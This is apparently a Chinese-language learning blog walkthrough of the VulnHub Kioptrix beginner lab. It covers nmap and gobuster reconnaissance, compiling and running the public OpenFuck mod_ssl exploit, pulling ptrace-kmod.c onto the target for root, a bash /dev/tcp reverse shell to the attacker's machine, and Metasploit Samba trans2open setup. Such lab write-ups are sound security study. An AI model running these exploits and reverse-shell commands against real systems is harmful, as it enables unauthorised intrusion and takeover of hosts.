vulnhub初级靶场


# 前期准备

下载,解压,nat模式,先kali扫一遍内网,再开机扫一遍,确定靶机ip

![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230822222618.png)

靶机ip 192.168.49.129
-sn是ping测试,不会探查端口,更快更隐蔽一些,-sP即有ping测试又探查端口,噪音比较大,正常来说还是-sn比较好

# 信息收集

## 端口

nmap -p- 192.168.49.129
全端口扫描
![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230822223921.png)
这里发现了139端口,没见过,但是博主说这是个常见端口,就查了一下信息

端口139通常用于 Windows 系统上的 NetBIOS 服务。NetBIOS(Network Basic Input/Output System)是一种早期的网络通信协议,用于在局域网中进行网络通信、文件和打印机共享等。它提供了一种在局域网内发现其他计算机、共享资源和进行通信的机制。 具体来说,端口139用于 NetBIOS 会话服务。通过该端口,计算机可以进行以下操作: 1. 文件和打印机共享: 端口139允许计算机共享文件夹和打印机,使其他计算机可以访问这些共享资源。 2. 通信和消息传递: NetBIOS 还可以用于计算机之间的通信和消息传递。它可以在局域网内广播消息,以便进行发现和通信。

干的事类似白天做的那个```python -m http.server```,就是传文件,发信息,网络通信共享资源的

其实这一步不做也可以,但是先扫出来端口更有条理一些

### 此时获得的信息
```bash
ip
192.168.49.129

端口开放
22 ssh
80 
111 rpcbind
139 文件传输资源共享
443
1024 kdm

系统版本信息全收集

-sV 版本信息
-A 版本,操作系统

```bash
┌──(root㉿kali)-[~]
└─# nmap -sV -A 192.168.49.129
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-22 10:49 EDT
Nmap scan report for 192.168.49.129
Host is up (0.0022s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-title: 400 Bad Request
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
|_ssl-date: 2023-08-22T14:51:55+00:00; +1m52s from scanner time.
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: 1m51s

TRACEROUTE
HOP RTT     ADDRESS
1   2.23 ms 192.168.49.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.26 seconds

这里一张图截屏截不下,干脆直接复制过来吧

简单分析一下,red hat系统,使用apache服务

apache路线

进站

看了一圈没发现什么有用信息,几个路径也访问不了 扫一下目录

gobuster dir --url http://192.168.49.129 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

(这里很奇怪,系统没下gobuster,也没有SecLists的字典只能先都下下来)

apt install gobuster
git clone https://github.com/danielmiessler/SecLists.git

试了下都没什么发现,要么权限不够进不去,要么就是跳转到红帽官网的页面了

apache版本是1.3.20

这里的1.3.20是对应着servelt的版本号,可以看出版本非常老旧了,那么就有目标了,搜索apache低版本相关的漏洞

漏洞提权

mod_ssl是apache HTTP 服务器的一个模块searchsploit是在exploit database(漏洞库)中搜索,这里也可以直接在https://www.rapid7.com/db/ 在线搜索,不过在kali里搜会出现相关漏洞路径,更方便一些(/usr/share/exploitdb/exploits)
![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230823003027.png)

在官网查到最新版本是这一条
```bash
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)|unix/remote/47080.c

给他copy到桌面方便操作

┌──(root㉿kali)-[/usr/share/exploitdb/exploits]
└─# cp unix/remote/47080.c /root/Desktop

这里打开脚本,注释里显示需要安装依赖,那么就开个虚拟环境安装依赖

python -m venv venv //我kali的python是python2
source venv/bin/activate
apt-get install libssl-dev
gcc -o 47080 47080.c -lcrypto
//gcc是编译器,-o 47080是生成名为47080的可执行文件,47080.c是需要编译的文件名字,-lcrypto是要引用的库,这个来自依赖的下一行

//内容
//博主说这是编译成功了,但乍一看就像失败了一样
┌──(venv)─(root㉿kali)-[~/Desktop/vulnhub]
└─# gcc -o 47080 47080.c -lcrypto
47080.c: In function ‘read_ssl_packet’:
47080.c:534:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  534 |                 RC4(ssl->rc4_read_key, rec_len, buf, buf);
      |                 ^~~
In file included from 47080.c:26:
/usr/include/openssl/rc4.h:37:28: note: declared here
   37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
      |                            ^~~
47080.c: In function ‘send_ssl_packet’:
47080.c:583:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  583 |                 MD5_Init(&ctx);
      |                 ^~~~~~~~
In file included from 47080.c:27:
/usr/include/openssl/md5.h:49:27: note: declared here
   49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
      |                           ^~~~~~~~
47080.c:584:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  584 |                 MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:585:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  585 |                 MD5_Update(&ctx, rec, rec_len);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:586:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  586 |                 MD5_Update(&ctx, &seq, 4);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:587:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  587 |                 MD5_Final(p, &ctx);
      |                 ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
   51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
      |                           ^~~~~~~~~
47080.c:594:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  594 |                 RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
      |                 ^~~
/usr/include/openssl/rc4.h:37:28: note: declared here
   37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
      |                            ^~~
47080.c: In function ‘send_client_master_key’:
47080.c:748:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  748 |         if (EVP_PKEY_get1_RSA(pkey) == NULL) {
      |         ^~
In file included from /usr/include/openssl/x509.h:29,
                 from /usr/include/openssl/ssl.h:31,
                 from 47080.c:21:
/usr/include/openssl/evp.h:1348:16: note: declared here
 1348 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
      |                ^~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘RSA_public_encrypt’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  754 |         encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
      |         ^~~~~~~~~~~~~~~~~~~~
In file included from /usr/include/openssl/x509.h:36:
/usr/include/openssl/rsa.h:282:5: note: declared here
  282 | int RSA_public_encrypt(int flen, const unsigned char *from, unsigned char *to,
      |     ^~~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  754 |         encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
      |         ^~~~~~~~~~~~~~~~~~~~
/usr/include/openssl/evp.h:1348:16: note: declared here
 1348 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
      |                ^~~~~~~~~~~~~~~~~
47080.c: In function ‘generate_key_material’:
47080.c:791:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  791 |                 MD5_Init(&ctx);
      |                 ^~~~~~~~
/usr/include/openssl/md5.h:49:27: note: declared here
   49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
      |                           ^~~~~~~~
47080.c:793:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  793 |                 MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:794:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  794 |                 MD5_Update(&ctx,&c,1);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:796:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  796 |                 MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:797:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  797 |                 MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:798:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  798 |                 MD5_Final(km,&ctx);
      |                 ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
   51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
      |                           ^~~~~~~~~
47080.c: In function ‘generate_session_keys’:
47080.c:807:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  807 |         RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
      |         ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
   35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
      |                            ^~~~~~~~~~~
47080.c:811:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  811 |         RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
      |         ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
   35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
      |                            ^~~~~~~~~~~

脚本已经生成,运行./47080执行脚本,这里不能直接47080

┌──(venv)─(root㉿kali)-[~/Desktop/vulnhub]
└─# ./47080   

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./47080 target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)
  

  Supported OffSet:
        0x00 - Caldera OpenLinux (apache-1.3.26)
        0x01 - Cobalt Sun 6.0 (apache-1.3.12)
        0x02 - Cobalt Sun 6.0 (apache-1.3.20)
        0x03 - Cobalt Sun x (apache-1.3.26)
        0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
        0x05 - Conectiva 4 (apache-1.3.6)
        0x06 - Conectiva 4.1 (apache-1.3.9)
        0x07 - Conectiva 6 (apache-1.3.14)
        0x08 - Conectiva 7 (apache-1.3.12)
        0x09 - Conectiva 7 (apache-1.3.19)
        0x0a - Conectiva 7/8 (apache-1.3.26)
        0x0b - Conectiva 8 (apache-1.3.22)
        0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
        0x0d - Debian GNU Linux (apache_1.3.19-1)
        0x0e - Debian GNU Linux (apache_1.3.22-2)
        0x0f - Debian GNU Linux (apache-1.3.22-2.1)
        0x10 - Debian GNU Linux (apache-1.3.22-5)
        0x11 - Debian GNU Linux (apache_1.3.23-1)
        0x12 - Debian GNU Linux (apache_1.3.24-2.1)
        0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
        0x14 - Debian GNU Linux (apache_1.3.24-3)
        0x15 - Debian GNU Linux (apache-1.3.26-1)
        0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
        0x17 - Debian GNU Linux (apache-1.3.27)
        0x18 - FreeBSD (apache-1.3.9)
        0x19 - FreeBSD (apache-1.3.11)
        0x1a - FreeBSD (apache-1.3.12.1.40)
        0x1b - FreeBSD (apache-1.3.12.1.40)
        0x1c - FreeBSD (apache-1.3.12.1.40)
        0x1d - FreeBSD (apache-1.3.12.1.40_1)
        0x1e - FreeBSD (apache-1.3.12)
        0x1f - FreeBSD (apache-1.3.14)
        0x20 - FreeBSD (apache-1.3.14)
        0x21 - FreeBSD (apache-1.3.14)
        0x22 - FreeBSD (apache-1.3.14)
        0x23 - FreeBSD (apache-1.3.14)
        0x24 - FreeBSD (apache-1.3.17_1)
        0x25 - FreeBSD (apache-1.3.19)
        0x26 - FreeBSD (apache-1.3.19_1)
        0x27 - FreeBSD (apache-1.3.20)
        0x28 - FreeBSD (apache-1.3.20)
        0x29 - FreeBSD (apache-1.3.20+2.8.4)
        0x2a - FreeBSD (apache-1.3.20_1)
        0x2b - FreeBSD (apache-1.3.22)
        0x2c - FreeBSD (apache-1.3.22_7)
        0x2d - FreeBSD (apache_fp-1.3.23)
        0x2e - FreeBSD (apache-1.3.24_7)
        0x2f - FreeBSD (apache-1.3.24+2.8.8)
        0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
        0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
        0x32 - FreeBSD (apache-1.3.27)
        0x33 - Gentoo Linux (apache-1.3.24-r2)
        0x34 - Linux Generic (apache-1.3.14)
        0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
        0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
        0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
        0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
        0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
        0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
        0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
        0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
        0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
        0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
        0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
        0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
        0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
        0x42 - Mandrake Linux 8.2 (apache-1.3.24)
        0x43 - Mandrake Linux 9 (apache-1.3.26)
        0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
        0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
        0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
        0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
        0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
        0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
        0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
        0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
        0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
        0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
        0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
        0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
        0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
        0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
        0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
        0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
        0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
        0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
        0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
        0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
        0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
        0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
        0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
        0x5b - Redhat Linux 7.x (apache-1.3.22)
        0x5c - RedHat Linux 7.x (apache-1.3.26-1)
        0x5d - RedHat Linux 7.x (apache-1.3.27)
        0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
        0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
        0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
        0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
        0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
        0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
        0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
        0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
        0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
        0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
        0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
        0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
        0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
        0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
        0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
        0x6d - RedHat Linux 7.2 (apache-1.3.24)
        0x6e - RedHat Linux 7.2 (apache-1.3.26)
        0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
        0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
        0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
        0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
        0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
        0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
        0x75 - RedHat Linux 7.3 (apache-1.3.27)
        0x76 - RedHat Linux 8.0 (apache-1.3.27)
        0x77 - RedHat Linux 8.0-second (apache-1.3.27)
        0x78 - RedHat Linux 8.0 (apache-2.0.40)
        0x79 - Slackware Linux 4.0 (apache-1.3.6)
        0x7a - Slackware Linux 7.0 (apache-1.3.9)
        0x7b - Slackware Linux 7.0 (apache-1.3.26)
        0x7c - Slackware 7.0  (apache-1.3.26)2
        0x7d - Slackware Linux 7.1 (apache-1.3.12)
        0x7e - Slackware Linux 8.0 (apache-1.3.20)
        0x7f - Slackware Linux 8.1 (apache-1.3.24)
        0x80 - Slackware Linux 8.1 (apache-1.3.26)
        0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
        0x82 - Slackware Linux (apache-1.3.27)
        0x83 - SuSE Linux 7.0 (apache-1.3.12)
        0x84 - SuSE Linux 7.1 (apache-1.3.17)
        0x85 - SuSE Linux 7.2 (apache-1.3.19)
        0x86 - SuSE Linux 7.3 (apache-1.3.20)
        0x87 - SuSE Linux 8.0 (apache-1.3.23)
        0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
        0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
        0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)

Fuck to all guys who like use lamah ddos. Read SRC to have no surprise

这里给了使用说明,

![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230823114242.png)这里先找到对应版本号,分别是0×6a和0×6b可用

```bash
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

所以脚本执行就是./47080 0×6a 192.168.49.129 -c 40

a失败,b成功,但是是apache而不是root,还得提权

这里不是root用户,提示是缺少文件了

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
//ptrace-kmod就是要用的但缺少的脚本
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory

所以就要下载对应的文件,这里先把47080.c给拿到本机来检查一下(刚好可以用昨天学的python http传文件 8000端口)

ctrl F查找

kali能下,但是靶机下不下来,那就传过去,

wget 192.168.49.130:8000/ptrace-kmod.c

成功下下来了 ok,root权限到手,之前的原因是,那个cpp脚本会自动下载对应的库(应该是,或者说别的依赖)并进行编译,但是那边网络连接不了,下不下来那个文件,那我们就自己下下来并传上去,然后就ok了

passwd,改一下密码 可以进入了,这里感觉其实已经结束了,但是接着跟着教程走学思路,接下来来个反弹shell

反弹shell

//kali
nc -lvvp 1234
//netcat l 监听端口 vv(v也可以)详细信息 p 1234  kali开放的端口号
//靶机,这里的130是kali的ip
bash -i >&  /dev/tcp/192.168.49.130/1234 0>&1
//bash -i是可交互式命令
// >& /dev/tcp/192.168.49.130/1234 前面的>是把bash的交互的流传到后面的文件保存,&是类似指定文件的符号? dev/tcp/ip/port是固定模式,就是以tcp的方式进行连接
// 0>&1  0是标准输入(键盘敲的内容),传到1,1是标准输出,即屏幕能看到的内容就是1

连接成功

samba路线

139端口

探查版本

没思路,视频说开msf能查,那就开吧,msfconsole启动 SMB(Server Message Block)是一种网络协议,用于在计算机之间共享文件、打印机和其他资源。它最初由微软开发,后来成为了一种广泛使用的网络协议,用于在本地网络中实现文件和资源共享。

search smb
//smb最常用的是139和445端口
//msf的终端搜索有点像普通搜索引擎,可以关键字空格关键字这样来实现联合搜搜,这里要查版本,所以搜索
search smb version
//漏洞使用方式就是 use 名字
use auxiliary/scanner/smb/smb_version
show options //显示各种选项,这个指令应该是通用的
set rhost 192.168.49.129 //设置目标
run //执行

msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.49.129:139    - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.49.129:139    -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.49.129:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

//拿到版本号2.2.1a
msf6 > search smb 2.2.x
[-] No results from search
msf6 > search samba 2.2.x

Matching Modules
================

   #  Name                              Disclosure Date  Rank     Check  Description
   -  ----                              ---------------  ----     -----  -----------
   0  exploit/multi/samba/nttrans       2003-04-07       average  No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   1  exploit/freebsd/samba/trans2open  2003-04-07       great    No     Samba trans2open Overflow (*BSD x86)
   2  exploit/linux/samba/trans2open    2003-04-07       great    No     Samba trans2open Overflow (Linux x86)
   3  exploit/osx/samba/trans2open      2003-04-07       great    No     Samba trans2open Overflow (Mac OS X PPC)
   4  exploit/solaris/samba/trans2open  2003-04-07       great    No     Samba trans2open Overflow (Solaris SPARC)


Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/trans2open


//这一步并没有很能看懂,知道139端口,是怎么继续知道smb和samaba这两个名字来继续搜索漏洞的
//根据操作系统,选择exploit/linux/samba/trans2open
//这里还要设一个payload,这个知识盲区了
set payload linux/x86/shell_bind_tcp

Category: 安全 | Tags: 安全 | Created: 2024-11-29 14:45:48